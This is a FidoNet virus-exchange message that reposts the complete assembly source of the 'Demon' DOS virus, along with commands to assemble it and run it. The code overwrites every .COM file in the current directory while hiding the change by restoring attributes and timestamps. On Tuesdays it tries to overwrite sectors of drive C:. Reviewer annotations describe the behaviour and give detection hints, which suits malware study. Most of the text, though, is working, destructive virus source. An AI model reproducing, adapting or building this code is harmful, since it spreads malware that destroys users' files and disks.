;- PVT.VIRII (2:465/65.4) ------------------------------------- PVT.VIRII -
; Msg  : 32 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To   : - *.* - Fri 11 Nov 94 08:10
; Subj : DEMON.ASM
;--------------------------------------------------------------------------
;.RealName: Max Ivanov
;==========================================================================
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Information about viruses)  [Russian in the original; decoded from CP866 mojibake]
;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:57)
;* To   : Dr T.
;* Subj : DEMON.ASM
;==========================================================================
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Dt: 19-Oct-91 04:19
;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org
;By: Skin Head
;To: All
;Re: New Source Code
;========== Demon virus ==================================== 22.09.91 ========
;
; Assemble and link with: TASM DEMON.VIR
;                         TLINK DEMON /X/T
; Infect all .COM programs in current directory with: DEMON
;
; !!! NOT ON A TUESDAY !!!
;
;-----------------------------------------------------------------------------
; Analysis notes (reviewer annotations; every instruction and data
; definition below is exactly as published)
;
; Format   : 16-bit DOS .COM image (org 0100h), TASM syntax.
; Class    : overwriting file infector with a day-of-week triggered
;            disk-write payload.
; Spread   : enumerates '*.COM' with INT 21h AH=4Eh/4Fh. The search spec
;            carries no path, so only the current directory is covered.
;            Replicate is called for every match; no check for an earlier
;            infection is visible, so files are overwritten again on
;            every run.
; Damage   : Replicate writes Virus_Size bytes, starting at label Demon,
;            over the beginning of each target. The original bytes are
;            never read or saved, so the host cannot be repaired from the
;            infected file itself; recovery means restoring a clean copy.
; Hiding   : file attributes are saved, cleared and put back
;            (AX=4300h/4301h), and the date/time stamp is saved and put
;            back (AX=5700h/5701h). Attribute or timestamp comparison
;            therefore misses the change; comparing file contents
;            (hash / integrity baseline) does not.
; Trigger  : after the infection pass, INT 21h AH=2Ah is queried and
;            AL == Tuesday (2) leads to the INT 26h loop at Write_Sectors.
;            The author's own comment marks that path as not working.
; Static   : the body is stored in the clear. The strings at Copyright
; strings    and Virus_Msg sit between Demon and Virus_End, so they are
;            copied verbatim into every overwritten file. Whitespace in
;            this listing was altered in transit; confirm exact bytes
;            against a sample before relying on them as a signature.
;-----------------------------------------------------------------------------
;
;-------------- Constants and structures

Tuesday         =       2                       ; INT 21h, AH=2Ah

; Layout of the record DOS fills in on find-first / find-next.
Search_Rec      struc                           ; directory search record
                db      21 dup (?)              ; reserved for DOS
FileAttr        db      ?                       ; file attribute
FileTime        dw      ?                       ; packed file time
FileDate        dw      ?                       ; packed file date
FileSize        dd      ?                       ; long file size
FileName        db      13 dup (?)              ; ASCIIZ FILENAME.EXT
Search_Rec      ends

;-------------- Demon virus segment

Virus           segment
                assume  cs:Virus,ds:Virus,es:Virus,ss:Virus

; The search record is overlaid on offset 80h, the default DTA inside the
; PSP, so find-first/find-next results are read from there and no
; set-DTA call appears in the code.
                org     0080h
DTA             Search_Rec <>                   ; disk transfer area

                org     0100h
Demon:                                          ; virus entry point
Virus_Size      =       Virus_End - Demon       ; virus size = 272 bytes

; --- Infection pass: find first match, then loop over the rest. ---------
                mov     dx,offset All_COM       ; find first .COM file,
                mov     ah,4eh                  ; including hidden/system
                mov     cx,110bh
                int     21h
                nop
                jnc     Infect                  ; abort if no files found
                jmp     short Check_Day
Infect:         call    Replicate               ; overwrite first 272 bytes
                mov     dx,offset DTA
                mov     ah,4fh                  ; find next .COM file,
                int     21h                     ; go check day if none found
                nop                             ; else repeat
                jnc     Next_File
                jmp     short Check_Day
Next_File:      jmp     Infect

; --- Trigger check: runs once the directory scan ends (or an open fails
;     inside Replicate). Any day other than Tuesday exits to DOS. ---------
Check_Day:      mov     ah,2ah                  ; get DOS date, check day
                int     21h
                cmp     al,Tuesday              ; Tuesday ?
                je      Thrash_Drive            ; if yes, thrash drive C:
                mov     ah,4ch                  ; else exit to DOS
                int     21h

; --- Payload path: left exactly as published, including the author's
;     remark that it does not work. Counter bounds the loop at 10 passes
;     of INT 26h (DOS absolute disk write). -------------------------------
Thrash_Drive:   mov     Counter,0               ; overwrite first 160 sectors
                jmp     Write_Sectors           ; of drive C: with garbage
Write_Sectors:  mov     al,Drive_C              ; Error: doesn't work !
                mov     cx,160                  ; AL=C:, CX=160 sectors
                mov     dx,0                    ; DX=highest sector in drive !
                mov     bx,0                    ; DS:BX=start of PSP area
                int     26h                     ; overwrite sectors
                inc     Counter
                cmp     Counter,10              ; repeat 10 times
                je      Show_Msg
                jne     Write_Sectors
Show_Msg:       mov     ah,09h                  ; show a fake error message
                mov     dx,offset Virus_Msg     ; and exit to DOS
                int     21h
                mov     ah,4ch
                int     21h

;-----------------------------------------------------------------------------
; Replicate - overwrite the file named in DTA.FileName with the virus image.
; In:    DTA.FileName = ASCIIZ name left by the preceding find call
; Out:   nothing the caller tests
; Uses:  ax, bx (file handle), cx, dx; COM_Attr, COM_Time, COM_Date
; Note:  only the open call is checked for failure. On failure control
;        goes to Check_Day instead of returning, which ends the infection
;        pass, and the attributes cleared just before are not put back.
;-----------------------------------------------------------------------------
Replicate:      mov     dx,offset DTA.FileName  ; save file attribute
                mov     ax,4300h
                int     21h
                mov     COM_Attr,cx
                nop
                xor     cx,cx                   ; unprotect the .COM file
                mov     ax,4301h                ; in case it's read-only
                int     21h
                nop
                mov     ax,3d02h                ; open .COM file for R/W,
                int     21h                     ; abort on error
                nop
                jc      Check_Day
                mov     bx,ax                   ; BX = file handle
                mov     ax,5700h
                int     21h                     ; save file date and time
                nop
                mov     COM_Time,cx
                mov     COM_Date,dx
                mov     dx,offset Demon         ; overwrite first 272 bytes
                mov     ah,40h                  ; of .COM program file
                mov     cx,Virus_Size           ; with the virus code
                int     21h
                nop
                mov     ax,5701h                ; restore file date and time
                mov     dx,COM_Date
                mov     cx,COM_Time
                int     21h
                mov     ah,3eh                  ; close the file
                int     21h
                nop
                mov     dx,offset DTA.FileName  ; restore file attribute
                mov     cx,COM_Attr
                mov     ax,4301h
                int     21h
                retn

; --- Data. Everything up to Virus_End is part of the image that Replicate
;     writes, so the two text strings below travel with every copy. -------
All_COM         db      '*.COM',0               ; dir search specification
COM_Date        dw      0                       ; packed .COM program date
COM_Time        dw      0                       ; packed .COM program time
COM_Attr        dw      0                       ; .COM program file attribute
Counter         db      0                       ; used when thrashing drive C:
Drive_C         db      2                       ; INT 26h C: drive number
                dw      0
Copyright       db      'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)'
                dw      0
Virus_Msg       db      10,13,'Error eating drive C:',10,13,'$'

Virus_End       label   byte                    ; virus code+data end

Virus           ends
                end     Demon

;-+- FastEcho/386 1.41.b7/Real
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; * The MeTeO
;
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
;
;--- Aidstest Null: /Kill
; * Origin: .PVT.ViRII.main.board. / Virus Research labs. (2:5030/136)